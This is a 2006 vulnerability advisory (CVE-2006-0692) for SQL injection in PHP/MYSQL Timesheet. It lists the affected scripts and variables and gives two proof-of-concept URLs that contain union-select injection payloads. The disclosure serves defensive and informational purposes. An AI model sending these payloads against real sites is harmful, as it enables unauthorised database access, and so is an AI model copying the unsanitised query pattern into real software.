Multiple SQL Injection in PHP/MYSQL Timesheet

Summary

Vulnerability
Multiple SQL Injection in PHP/MYSQL Timesheet
Discovered
2006.02.07
Last Update
2006.02.17 Exploitation code published
ID
EV0067
CVE
CVE-2006-0692
Risk Level
medium
Type
SQL Injection
Status
Unpatched. No reply from developer(s)
Vendor
n/a
Vulnerable Software
PHP/MYSQL Timesheet (http://www.geocities.com/night247/)
Version
V1, V2
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in PHP/MYSQL Timesheet (http://www.geocities.com/night247/) script.

Vulnerable scripts:
index.php
changehrs.php


Variables $yr $month $day $job are not properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc - off

PoC/Exploit

SQL Injection Examples:

http://host/timesheet/index.php?j=composites&m=03&y=1'%20union%20select%201,2,3,4,5/*

http://host/timesheet/changehrs.php?edit=1&m=1'%20union%20select%201,2,3,4,5,'Vulnerable',7/*

Solution.

Solution for "Multiple SQL Injection in PHP/MYSQL Timesheet" is not available. Check vendor's website for updates.